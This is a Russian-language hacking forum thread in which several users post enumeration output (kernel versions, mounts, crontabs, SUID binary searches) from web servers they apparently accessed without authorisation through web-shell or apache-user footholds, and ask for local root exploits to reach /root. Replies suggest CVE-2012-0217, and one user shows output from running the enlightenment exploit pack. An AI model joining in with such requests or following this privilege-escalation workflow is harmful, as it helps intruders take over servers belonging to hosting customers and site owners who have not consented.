lrwxrwxrwx 1 root root 17 2013-08-26 16:29:34.457486791 +0400 libmount.so.1 -> libmount.so.1.1.0*
-rwxr-xr-x 1 root root 68304 2013-04-29 11:43:56.000000000 +0400 libmount.so.1.1.0*
lrwxrwxrwx 1 root root 12 2015-01-28 15:09:32.958483737 +0300 libm.so.6 -> libm-2.12.so*
lrwxrwxrwx 1 root root 17 2013-01-16 16:10:57.000000000 +0400 libncurses.so.5 -> libncurses.so.5.7*
-rwxr-xr-x 1 root root 142536 2010-08-18 19:42:28.000000000 +0400 libncurses.so.5.7*
lrwxrwxrwx 1 root root 18 2013-01-16 16:10:57.000000000 +0400 libncursesw.so.5 -> libncursesw.so.5.7*
-rwxr-xr-x 1 root root 195616 2010-08-18 19:42:28.000000000 +0400 libncursesw.so.5.7*
lrwxrwxrwx 1 root root 20 2013-01-16 16:10:57.000000000 +0400 libnih-dbus.so.1 -> libnih-dbus.so.1.0.0*
-rwxr-xr-x 1 root root 39896 2011-12-07 21:40:52.000000000 +0400 libnih-dbus.so.1.0.0*
lrwxrwxrwx 1 root root 15 2013-01-16 16:10:57.000000000 +0400 libnih.so.1 -> libnih.so.1.0.0*
-rwxr-xr-x 1 root root 101920 2011-12-07 21:40:52.000000000 +0400 libnih.so.1.0.0*
lrwxrwxrwx 1 root root 14 2013-08-26 16:29:48.257863034 +0400 libnl.so.1 -> libnl.so.1.1.4*
-rwxr-xr-x 1 root root 337248 2013-06-28 03:58:04.000000000 +0400 libnl.so.1.1.4*
-rwxr-xr-x 1 root root 116368 2015-01-27 22:38:12.000000000 +0300 libnsl-2.12.so*
lrwxrwxrwx 1 root root 14 2015-01-28 15:09:32.964484369 +0300 libnsl.so.1 -> libnsl-2.12.so*
-rwxr-xr-x 1 root root 247192 2014-07-22 22:06:22.000000000 +0400 libnspr4.so*
-rwxr-xr-x 1 root root 42808 2015-01-27 22:38:11.000000000 +0300 libnss_compat-2.12.so*
lrwxrwxrwx 1 root root 21 2015-01-28 15:09:32.966483996 +0300 libnss_compat.so.2 -> libnss_compat-2.12.so*
-rwxr-xr-x 1 root root 27424 2015-01-27 22:38:12.000000000 +0300 libnss_dns-2.12.so*
lrwxrwxrwx 1 root root 18 2015-01-28 15:09:32.970483722 +0300 libnss_dns.so.2 -> libnss_dns-2.12.so*
-rwxr-xr-x 1 root root 65928 2015-01-27 22:38:11.000000000 +0300 libnss_files-2.12.so*
lrwxrwxrwx 1 root root 20 2015-01-28 15:09:32.973483747 +0300 libnss_files.so.2 -> libnss_files-2.12.so*
-rwxr-xr-x 1 root root 24152 2015-01-27 22:38:10.000000000 +0300 libnss_hesiod-2.12.so*
lrwxrwxrwx 1 root root 21 2015-01-28 15:09:32.981483880 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so*
-rwxr-xr-x 1 root root 52560 2015-01-27 22:38:11.000000000 +0300 libnss_nis-2.12.so*
-rwxr-xr-x 1 root root 61712 2015-01-27 22:38:10.000000000 +0300 libnss_nisplus-2.12.so*
lrwxrwxrwx 1 root root 22 2015-01-28 15:09:32.987484337 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so*
lrwxrwxrwx 1 root root 18 2015-01-28 15:09:32.983483930 +0300 libnss_nis.so.2 -> libnss_nis-2.12.so*
lrwxrwxrwx 1 root root 17 2013-08-26 16:29:19.640487432 +0400 libpamc.so.0 -> libpamc.so.0.82.1*
-rwxr-xr-x 1 root root 14528 2013-02-22 04:16:03.000000000 +0400 libpamc.so.0.82.1*
lrwxrwxrwx 1 root root 21 2013-08-26 16:29:19.639487003 +0400 libpam_misc.so.0 -> libpam_misc.so.0.82.0*
-rwxr-xr-x 1 root root 17248 2013-02-22 04:16:03.000000000 +0400 libpam_misc.so.0.82.0*
lrwxrwxrwx 1 root root 16 2013-08-26 16:29:19.637487571 +0400 libpam.so.0 -> libpam.so.0.82.2*
-rwxr-xr-x 1 root root 58480 2013-02-22 04:16:03.000000000 +0400 libpam.so.0.82.2*
lrwxrwxrwx 1 root root 16 2013-08-26 16:29:37.784549227 +0400 libpci.so.3 -> libpci.so.3.1.10*
-rwxr-xr-x 1 root root 51472 2013-02-22 02:31:11.000000000 +0400 libpci.so.3.1.10*
lrwxrwxrwx 1 root root 16 2013-08-26 16:29:27.530487312 +0400 libpcre.so.0 -> libpcre.so.0.0.1*
-rwxr-xr-x 1 root root 183816 2012-09-07 15:03:38.000000000 +0400 libpcre.so.0.0.1*
-rwxr-xr-x 1 root root 21288 2014-07-22 22:06:22.000000000 +0400 libplc4.so*
-rwxr-xr-x 1 root root 17128 2014-07-22 22:06:22.000000000 +0400 libplds4.so*
lrwxrwxrwx 1 root root 16 2013-01-16 16:10:57.000000000 +0400 libpopt.so.0 -> libpopt.so.0.0.0*
-rwxr-xr-x 1 root root 38808 2010-08-21 09:30:58.000000000 +0400 libpopt.so.0.0.0*
-rwxr-xr-x 1 root root 65608 2012-11-15 17:54:14.000000000 +0400 libproc-3.2.8.so*
lrwxrwxrwx 1 root root 16 2013-08-26 16:29:27.723736249 +0400 libproc.so -> libproc-3.2.8.so*
-rwxr-xr-x 1 root root 145896 2015-01-27 22:38:12.000000000 +0300 libpthread-2.12.so*
lrwxrwxrwx 1 root root 18 2015-01-28 15:09:32.996483709 +0300 libpthread.so.0 -> libpthread-2.12.so*
lrwxrwxrwx 1 root root 18 2014-09-11 06:35:16.830484171 +0400 libreadline.so.5 -> libreadline.so.5.2*
-rwxr-xr-x 1 root root 261144 2010-11-11 06:19:38.000000000 +0300 libreadline.so.5.2*
lrwxrwxrwx 1 root root 18 2013-01-16 16:10:57.000000000 +0400 libreadline.so.6 -> libreadline.so.6.0*
-rwxr-xr-x 1 root root 272008 2012-06-22 10:54:32.000000000 +0400 libreadline.so.6.0*
-rwxr-xr-x 1 root root 113952 2015-01-27 22:38:11.000000000 +0300 libresolv-2.12.so*
lrwxrwxrwx 1 root root 17 2015-01-28 15:09:33.003484346 +0300 libresolv.so.2 -> libresolv-2.12.so*
-rwxr-xr-x 1 root root 47112 2015-01-27 22:38:10.000000000 +0300 librt-2.12.so*
lrwxrwxrwx 1 root root 13 2015-01-28 15:09:33.006484168 +0300 librt.so.1 -> librt-2.12.so*
-rwxr-xr-x 1 root root 21928 2015-01-27 22:38:11.000000000 +0300 libSegFault.so*
-rwxr-xr-x 1 root root 124624 2013-05-10 13:06:33.000000000 +0400 libselinux.so.1*
-rwxr-xr-x 1 root root 201824 2013-02-22 04:21:47.000000000 +0400 libsemanage.so.1*
-rwxr-xr-x 1 root root 251112 2011-12-07 22:01:08.000000000 +0400 libsepol.so.1*
lrwxrwxrwx 1 root root 12 2014-04-09 10:20:41.035755091 +0400 libss.so.2 -> libss.so.2.0*
-rwxr-xr-x 1 root root 29656 2013-11-22 16:56:01.000000000 +0400 libss.so.2.0*
-rwxr-xr-x 1 root root 34008 2015-01-27 22:38:11.000000000 +0300 libthread_db-1.0.so*
lrwxrwxrwx 1 root root 19 2015-01-28 15:09:33.013484386 +0300 libthread_db.so.1 -> libthread_db-1.0.so*
lrwxrwxrwx 1 root root 15 2013-01-16 16:10:57.000000000 +0400 libtinfo.so.5 -> libtinfo.so.5.7*
-rwxr-xr-x 1 root root 138280 2010-08-18 19:42:28.000000000 +0400 libtinfo.so.5.7*
lrwxrwxrwx 1 root root 18 2013-08-26 16:29:47.896615564 +0400 libtirpc.so.1 -> libtirpc.so.1.0.10*
-rwxr-xr-x 1 root root 161984 2013-05-30 22:54:27.000000000 +0400 libtirpc.so.1.0.10*
-rwxr-xr-x 1 root root 17520 2015-01-27 22:38:10.000000000 +0300 libutil-2.12.so*
lrwxrwxrwx 1 root root 15 2015-01-28 15:09:33.013484386 +0300 libutil.so.1 -> libutil-2.12.so*
lrwxrwxrwx 1 root root 16 2013-08-26 16:29:27.458487528 +0400 libuuid.so.1 -> libuuid.so.1.3.0*
-rwxr-xr-x 1 root root 18936 2013-04-29 11:43:56.000000000 +0400 libuuid.so.1.3.0*
lrwxrwxrwx 1 root root 16 2013-01-16 16:10:57.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6*
-rwxr-xr-x 1 root root 40792 2011-12-07 21:45:47.000000000 +0400 libwrap.so.0.7.6*
lrwxrwxrwx 1 root root 36 2013-08-26 16:30:17.379674066 +0400 libxtables.so.4 -> /etc/alternatives/libxtables4.x86_64*
lrwxrwxrwx 1 root root 38 2013-08-26 16:30:17.379674066 +0400 libxtables.so.4.0.0 -> /etc/alternatives/libxtables400.x86_64*
-rwxr-xr-x 1 root root 34616 2013-02-22 05:45:53.000000000 +0400 libxtables.so.4.0.0-1.4.7*
lrwxrwxrwx 1 root root 25 2013-08-26 16:29:33.594486893 +0400 libxtables.so.4-1.4.7 -> libxtables.so.4.0.0-1.4.7*
lrwxrwxrwx 1 root root 13 2013-08-26 16:29:18.217491166 +0400 libz.so.1 -> libz.so.1.2.3*
-rwxr-xr-x 1 root root 91096 2013-02-22 03:02:16.000000000 +0400 libz.so.1.2.3*
drwxr-xr-x 2 root root 4096 2013-10-01 18:37:18.198486390 +0400 rsyslog/
drwxr-xr-x 2 root root 4096 2015-01-28 15:09:33.027484329 +0300 rtkaio/
drwxr-xr-x 3 root root 4096 2013-08-26 16:29:19.668550214 +0400 security/
dr-xr-xr-x 2 root root 4096 2014-02-20 21:32:33.000000000 +0400 tls/
lrwxrwxrwx 1 root root 36 2013-08-26 16:30:17.379674066 +0400 xtables -> /etc/alternatives/lib-xtables.x86_64/
drwxr-xr-x 2 root root 4096 2013-08-26 16:29:33.634737660 +0400 xtables-1.4.7/
[apache@vs01.**********.ru ~]$ ls -la --full-time /lib
total 28
dr-xr-xr-x 7 root root 4096 2014-02-20 21:32:33.000000000 +0400 ./
dr-xr-xr-x 25 root root 4096 2015-03-25 03:33:40.839381604 +0300 ../
lrwxrwxrwx 1 root root 14 2014-04-09 10:20:40.229729238 +0400 cpp -> ../usr/bin/cpp*
drwxr-xr-x 2 root root 4096 2013-02-22 09:22:18.000000000 +0400 firmware/
dr-xr-xr-x 7 root root 4096 2015-03-17 02:06:50.808858882 +0300 modules/
drwxr-xr-x 2 root root 4096 2013-02-22 04:16:00.000000000 +0400 security/
drwxr-xr-x 6 root root 4096 2011-09-13 21:36:01.000000000 +0400 terminfo/
drwxr-xr-x 5 root root 4096 2015-01-29 05:33:58.058230195 +0300 udev/
[apache@vs01.**********.ru ~]$ mount
/dev/simfs on / type simfs (rw,relatime)
proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
none on /dev type devtmpfs (rw,relatime,mode=755)
none on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000)
tmpfs on /tmp/mysql_tmpfs type tmpfs (rw,relatime,size=2097152k,mode=700,uid=27,gid=27)
tmpfs on /srv/www/**********.com/htdocs/upload/responses type tmpfs (rw,relatime,size=524288k,mode=700,uid=48,gid=48)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
[apache@vs01.**********.ru ~]$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/simfs 5.3T 1.1T 4.2T 21% /
none 16G 4.0K 16G 1% /dev
tmpfs 2.0G 8.0K 2.0G 1% /tmp/mysql_tmpfs
tmpfs 512M 28K 512M 1% /srv/www/**********.com/htdocs/upload/responses
[apache@vs01.**********.ru ~]$ cat /etc/issue
CentOS release 6.4 (Final)
Kernel \r on an \m

[apache@vs01.**********.ru ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

[apache@vs01.**********.ru ~]$ cat /proc/version
Linux version 2.6.32-042stab093.4 (root@kbuild-rh6-x64) (gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC) ) #1 SMP Mon Aug 11 18:47:39 MSK 2014
[apache@vs01.**********.ru ~]$ cat /proc/sys/vm/mmap_min_addr
4096
[apache@vs01.**********.ru ~]$ pwd
/home/**********
[apache@vs01.**********.ru ~]$ ls -la /usr/bin/staprun
ls: cannot access /usr/bin/staprun: No such file or directory
[apache@vs01.**********.ru ~]$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

Есть ssh доступ, но доступа к /root/ нету, нужен туда доступ заполучить)))

YaBtr

25.03.2015, 16:53

sysjuk said:

Code:
[apache@vs01.**********.ru ~]$ uname -a
Linux ********** 2.6.32-042stab093.4 #1 SMP Mon Aug 11 18:47:39 MSK 2014 x86_64 x86_64 x86_64 GNU/Linux

Ядерного ничего нет.

[/QUOTE]
Ядерного ничего нет.
[/CODE]

[/QUOTE]

Vip77

30.03.2015, 00:03

Подскажите сплоит. Не смог найти

Code:
$ uname -a
FreeBSD *** 8.2-RELEASE-p6 FreeBSD 8.2-RELEASE-p6 #1: Mon Feb 13 10:42:12 MSK 2012 user1@***:/usr/obj/usr/src/sys/GENERIC amd64

$ ls -la /boot
total 3132
drwxr-xr-x 8 root wheel 1024 Feb 13 2012 .
drwxr-xr-x 22 root wheel 512 May 9 2014 ..
-r--r--r-- 1 root wheel 7690 Feb 13 2012 beastie.4th
-r--r--r-- 1 root wheel 8192 Feb 13 2012 boot
-r--r--r-- 1 root wheel 512 Feb 13 2012 boot0
-r--r--r-- 1 root wheel 512 Feb 13 2012 boot0sio
-r--r--r-- 1 root wheel 512 Feb 13 2012 boot1
-r--r--r-- 1 root wheel 7680 Feb 13 2012 boot2
-r--r--r-- 1 root wheel 1201 Feb 13 2012 cdboot
drwxr-xr-x 2 root wheel 512 Feb 13 2012 defaults
-r--r--r-- 1 root wheel 808 Feb 24 2008 device.hints
drwxr-xr-x 2 root wheel 512 Feb 24 2008 firmware
-r--r--r-- 1 root wheel 2262 Feb 13 2012 frames.4th
-r--r--r-- 1 root wheel 13851 Feb 13 2012 gptboot
-r--r--r-- 1 root wheel 27463 Feb 13 2012 gptzfsboot
drwxr-xr-x 2 root wheel 30208 Feb 13 2012 kernel
drwxr-xr-x 2 root wheel 30208 Aug 3 2011 kernel.old
-r-xr-xr-x 1 root wheel 237568 Feb 13 2012 loader
-r--r--r-- 1 root wheel 5865 Feb 13 2012 loader.4th
-rw-r--r-- 1 root wheel 195 Jan 28 2010 loader.conf
-r--r--r-- 1 root wheel 15219 Feb 13 2012 loader.help
-r-xr-xr-x 1 root wheel 237568 Aug 3 2011 loader.old
-r--r--r-- 1 root wheel 385 Feb 24 2008 loader.rc
-r--r--r-- 1 root wheel 512 Feb 13 2012 mbr
drwxr-xr-x 2 root wheel 512 Feb 24 2008 modules
-r--r--r-- 1 root wheel 512 Feb 13 2012 pmbr
-r--r--r-- 1 root wheel 239616 Feb 13 2012 pxeboot
-r--r--r-- 1 root wheel 703 Feb 13 2012 screen.4th
-r--r--r-- 1 root wheel 35136 Feb 13 2012 support.4th
drwxr-xr-x 2 root wheel 512 Feb 24 2008 zfs
-r--r--r-- 1 root wheel 33280 Feb 13 2012 zfsboot
-r-xr-xr-x 1 root wheel 258048 Feb 13 2012 zfsloader
-r-xr-xr-x 1 root wheel 258048 Aug 3 2011 zfsloader.old

$ lls -la --full-time /lib

$ mount
/dev/aacd0s1a on / (ufs, local)
devfs on /dev (devfs, local, multilabel)
/dev/aacd0s1d on /tmp (ufs, local, soft-updates)
/dev/aacd0s1f on /usr (ufs, local, soft-updates)
/dev/aacd0s1e on /var (ufs, local, soft-updates)
/dev/aacd1s1d on /home (ufs, local, soft-updates)

$ df -h
Filesystem Size Used Avail Capacity Mounted on
/dev/aacd0s1a 1.9G 592M 1.2G 33% /
devfs 1.0K 1.0K 0B 100% /dev
/dev/aacd0s1d 2.9G 490K 2.7G 0% /tmp
/dev/aacd0s1f 15G 3.8G 9.9G 28% /usr
/dev/aacd0s1e 29G 3.5G 23G 13% /var
/dev/aacd1s1d 406G 71G 303G 19% /home

$ cat /etc/issue

$ cat /etc/crontab
# /etc/crontab - root's crontab for FreeBSD
#
# $FreeBSD: src/etc/crontab,v 1.32 2002/11/22 16:13:39 tom Exp $
#
SHELL=/bin/sh
PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
HOME=/var/log
#
#minute hour mday month wday who command
#
*/5 * * * * root /usr/libexec/atrun
#
# Save some entropy so that /dev/random can re-seed on boot.
*/11 * * * * operator /usr/libexec/save-entropy
#
# Rotate log files every hour, if necessary.
0 * * * * root newsyslog
#
# Perform daily/weekly/monthly maintenance.
1 3 * * * root periodic daily
15 4 * * 6 root periodic weekly
30 5 1 * * root periodic monthly
#
# Adjust the time zone if the CMOS clock keeps local time, as opposed to
# UTC time. See adjkerntz(8) for details.
1,31 0-5 * * * root adjkerntz -a

$ ls -la cron.d

$ cat /proc/version

$ cat /proc/sys/vm/mmap_min_addr

$ pwd
/lib/geom

$ ls -la /usr/bin/staprun

$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-r-sr-xr-x 4 root wheel 30056 Feb 13 2012 /usr/bin/at
-r-sr-xr-x 4 root wheel 30056 Feb 13 2012 /usr/bin/atq
-r-sr-xr-x 4 root wheel 30056 Feb 13 2012 /usr/bin/atrm
-r-sr-xr-x 4 root wheel 30056 Feb 13 2012 /usr/bin/batch
-r-sr-xr-x 6 root wheel 22944 Feb 13 2012 /usr/bin/chpass
-r-sr-xr-x 6 root wheel 22944 Feb 13 2012 /usr/bin/chfn
-r-sr-xr-x 6 root wheel 22944 Feb 13 2012 /usr/bin/chsh
-r-sr-xr-x 6 root wheel 22944 Feb 13 2012 /usr/bin/ypchpass
-r-sr-xr-x 6 root wheel 22944 Feb 13 2012 /usr/bin/ypchfn
-r-sr-xr-x 6 root wheel 22944 Feb 13 2012 /usr/bin/ypchsh
-r-sr-xr-x 1 root wheel 11472 Feb 13 2012 /usr/bin/lock
-r-sr-xr-x 1 root wheel 25552 Feb 13 2012 /usr/bin/login
-r-sr-xr-x 1 root wheel 7032 Feb 13 2012 /usr/bin/opieinfo
-r-sr-xr-x 1 root wheel 14056 Feb 13 2012 /usr/bin/opiepasswd
-r-sr-xr-x 2 root wheel 8176 Feb 13 2012 /usr/bin/passwd
-r-sr-xr-x 2 root wheel 8176 Feb 13 2012 /usr/bin/yppasswd
-r-sr-xr-x 1 root wheel 16048 Feb 13 2012 /usr/bin/rlogin
-r-sr-xr-x 1 root wheel 11592 Feb 13 2012 /usr/bin/rsh
-r-sr-xr-x 1 root wheel 16904 Feb 13 2012 /usr/bin/su
-r-sr-xr-x 1 root wheel 33864 Feb 13 2012 /usr/bin/crontab
-r-sr-sr-x 1 root daemon 34232 Feb 13 2012 /usr/bin/lpq
-r-sr-sr-x 1 root daemon 38272 Feb 13 2012 /usr/bin/lpr
-r-sr-sr-x 1 root daemon 30248 Feb 13 2012 /usr/bin/lprm
---s--x--x 2 root wheel 1099192 Feb 13 2012 /usr/local/bin/sudo
---s--x--x 2 root wheel 1099192 Feb 13 2012 /usr/local/bin/sudoedit
-r-sr-sr-x 1 root authpf 20240 Feb 13 2012 /usr/sbin/authpf
-r-sr-x--- 1 root network 408712 Feb 13 2012 /usr/sbin/ppp
-r-sr-xr-x 1 root wheel 21080 Feb 13 2012 /usr/sbin/timedc
-r-sr-xr-x 1 root wheel 29456 Feb 13 2012 /usr/sbin/traceroute
-r-sr-xr-x 1 root wheel 24448 Feb 13 2012 /usr/sbin/traceroute6
-r-sr-xr-x 1 root wheel 20416 Feb 13 2012 /bin/rcp
-r-sr-x--- 1 root operator 9704 Feb 13 2012 /sbin/mksnap_ffs
-r-sr-xr-x 1 root wheel 28200 Feb 13 2012 /sbin/ping
-r-sr-xr-x 1 root wheel 37240 Feb 13 2012 /sbin/ping6
-r-sr-x--- 1 root operator 15952 Feb 13 2012 /sbin/shutdown

YaBtr

30.03.2015, 16:40

Vip77 said:
Подскажите сплоит. Не смог найти

Code:
$ uname -a
FreeBSD *** 8.2-RELEASE-p6 FreeBSD 8.2-RELEASE-p6 #1: Mon Feb 13 10:42:12 MSK 2012 user1@***:/usr/obj/usr/src/sys/GENERIC amd64

И вряд ли найдете :(
Есть такая штука, CVE-2012-0217, но сплоент отрабатывает только на ядрах с 8.3.

[/QUOTE]

И вряд ли найдете :(
Есть такая штука, CVE-2012-0217, но сплоент отрабатывает только на ядрах с 8.3.
[/CODE]

[/QUOTE]

sysjuk

04.04.2015, 12:54

Code:
$ uname -a
Linux ****** 2.6.32.26 #1 SMP Thu Dec 9 15:33:24 UTC 2010 x86_64 GNU/Linux
$ ls -la /boot
total 16696
drwxr-xr-x 3 root root 4096 Feb 24 10:19 .
drwxr-xr-x 23 root root 4096 Mar 22 23:06 ..
lrwxrwxrwx 1 root root 20 Dec 9 2010 System.map -> System.map-2.6.32.26
-rw-r--r-- 1 root root 1678996 Dec 9 2010 System.map-2.6.32.26
-rw-r--r-- 1 root root 2114446 Feb 22 08:16 System.map-3.2.0-4-amd64
lrwxrwxrwx 1 root root 16 Dec 9 2010 config -> config-2.6.32.26
-rw-r--r-- 1 root root 43412 Dec 9 2010 config-2.6.32.26
-rw-r--r-- 1 root root 129281 Feb 22 08:16 config-3.2.0-4-amd64
drwxr-xr-x 2 root root 4096 Feb 24 10:19 grub
-rw-r--r-- 1 root root 10235778 Feb 24 10:19 initrd.img-3.2.0-4-amd64
lrwxrwxrwx 1 root root 17 Dec 9 2010 vmlinuz -> vmlinuz-2.6.32.26
-rw-r--r-- 1 root root 2841408 Feb 22 08:05 vmlinuz-3.2.0-4-amd64
$ lls -la --full-time

$ ls -la --full-time
total 52
drwxr-xr-x 2 windows windows 4096 2015-03-30 05:32:50.000000000 +0300 .
drwxr-xr-x 4 windows windows 12288 2015-04-02 20:31:56.000000000 +0300 ..
-rwxrwxrwx 1 windows windows 30712 2015-03-29 22:00:04.000000000 +0300 index.php
$ mount
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
sys on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,relatime,size=1007792k,nr_inodes=251948,mode=7 55)
/dev/pts on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600,ptmxmode=000)
/dev/xvda1 on / type ext3 (rw,relatime,errors=panic,user_xattr,acl,data=orde red,usrquota,grpquota)
selinuxfs on /selinux type selinuxfs (rw,relatime)
tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=209088k,mode=755)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /run/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=418160k)
none on /proc/xen type xenfs (rw,relatime)
$ df -h
Filesystem Size Used Avail Use% Mounted on
rootfs 35G 22G 13G 64% /
udev 985M 0 985M 0% /dev
/dev/xvda1 35G 22G 13G 64% /
tmpfs 205M 108K 205M 1% /run
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 409M 0 409M 0% /run/shm
$ cat /etc/issue
Debian GNU/Linux 7 \n \l

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
$ ls -la cron.d

$ cat /proc/version
Linux version 2.6.32.26 (root@21-436.clodo.ru) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Thu Dec 9 15:33:24 UTC 2010
$ cat /proc/sys/vm/mmap_min_addr
4096
$ pwd
/var/www/windows/data/www/********/
$ ls -la /usr/bin/staprun

$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-rwsr-xr-x 1 root root 1103424 Jul 24 2014 /usr/sbin/exim4
-rwsr-xr-- 1 root www-data 18920 Dec 24 01:49 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 245064 Jun 30 2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 298544 Feb 10 00:37 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10496 Feb 22 14:42 /usr/lib/pt_chown
-r-sr-xr-x 1 root root 13024 Jul 27 2014 /usr/local/ispmgr/cgi/login
-r-sr-xr-x 1 root root 57344 Jul 27 2014 /usr/local/ispmgr/cgi/certdownload
-r-sr-xr-x 1 root root 49016 Jul 27 2014 /usr/local/ispmgr/cgi/upload
-r-sr-xr-x 1 root root 19816 Jul 27 2014 /usr/local/ispmgr/cgi/outlook
-r-sr-xr-x 1 root root 140408 Jul 27 2014 /usr/local/ispmgr/cgi/getuser
-r-sr-xr-x 1 root root 32752 Jul 27 2014 /usr/local/ispmgr/cgi/dbdownload
-r-sr-xr-x 1 root root 38264 Jul 27 2014 /usr/local/ispmgr/cgi/xml2csv
-r-sr-xr-x 1 root root 53992 Jul 27 2014 /usr/local/ispmgr/cgi/download
-r-sr-xr-x 1 root root 53248 Jul 27 2014 /usr/local/ispmgr/cgi/cronrun
-r-sr-xr-x 1 root root 53280 Jul 27 2014 /usr/local/ispmgr/cgi/mindterm
-r-sr-xr-x 1 root root 8280 Jul 27 2014 /usr/local/ispmgr/cgi/ispmgr
-r-sr-xr-x 1 root root 140888 Jul 27 2014 /usr/local/ispmgr/cgi/bdownload
-r-sr-xr-x 1 root root 5240 Jul 27 2014 /usr/local/ispmgr/sbin/suexec
-r-sr-xr-x 1 root root 36480 Jul 27 2014 /usr/local/ispmgr/sbin/vacation
-r-sr-xr-x 1 root root 1774704 Jul 27 2014 /usr/local/ispmgr/sbin/usermove
-r-sr-xr-x 1 root root 1146280 Jul 27 2014 /usr/local/ispmgr/sbin/pbackup
-r-sr-xr-x 1 root root 66392 Jul 27 2014 /usr/local/ispmgr/sbin/responder
-r-sr-xr-x 1 root root 1550632 Jul 27 2014 /usr/local/ispmgr/bin/ispmgr
-rwsr-xr-x 1 root root 46264 May 26 2012 /usr/bin/chfn
-rwsr-xr-x 1 root root 51096 May 26 2012 /usr/bin/passwd
-rwsr-xr-x 1 root root 41272 May 26 2012 /usr/bin/chsh
-rwsr-xr-x 1 root root 68024 May 26 2012 /usr/bin/gpasswd
-rwsr-xr-x 2 root root 112824 Feb 16 15:46 /usr/bin/sudo
-rwsr-xr-x 1 root root 36432 May 26 2012 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 55456 Oct 3 2014 /usr/bin/at
-rwsr-xr-x 2 root root 112824 Feb 16 15:46 /usr/bin/sudoedit
-rwsr-xr-x 1 root root 69080 Dec 11 2012 /bin/umount
-rwsr-xr-x 1 root root 36136 Apr 12 2011 /bin/ping
-rwsr-xr-x 1 root root 36816 May 26 2012 /bin/su
-rwsr-xr-x 1 root root 94776 Dec 11 2012 /bin/mount
-rwsr-xr-x 1 root root 36896 Apr 12 2011 /bin/ping6

Есть что нибудь для нее?

YaBtr

06.04.2015, 18:25

sysjuk, что Вы пробовали? Что с библиотеками? enlightenment?

sysjuk

06.04.2015, 19:00

YaBtr said:
↑ (https://antichat.live/posts/3835314/)
sysjuk
, что Вы пробовали? Что с библиотеками? enlightenment?

Пробывал enlightenment

./run_nonnull_exploits.sh 2>&1

Compiling exp_abacus.c...OK.

Compiling exp_cheddarbay.c...OK.

Compiling exp_ingom0wnar.c...OK.

Compiling exp_moosecox.c...OK.

Compiling exp_paokara.c...OK.

Compiling exp_powerglove.c...OK.

Compiling exp_sieve.c...OK.

Compiling exp_therebel.c...OK.

Compiling exp_vmware.c...OK.

Compiling exp_wunderbar.c...OK.

./run_null_exploits.sh: 44: ./run_null_exploits.sh: ./exploit: Permission denied

Таки не вкурил почему

Vip77

10.04.2015, 23:39

Есть что-нибудь под сие?

Code:
$ uname -a
Linux srv100 2.6.32-5-686-bigmem #1 SMP Sat May 5 02:21:15 UTC 2012 i686 GNU/Linux

$ mount
/dev/sda2 on / type ext4 (rw,noatime,errors=remount-ro)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
udev on /dev type tmpfs (rw,mode=0755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/sda1 on /boot type ext3 (rw,noatime)
/dev/sda5 on /var type ext4 (rw,noatime)
/dev/sda6 on /home type ext4 (rw,nosuid,nodev,noatime,usrquota)

$ cat /etc/issue
Debian GNU/Linux 6.0 \n \l

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
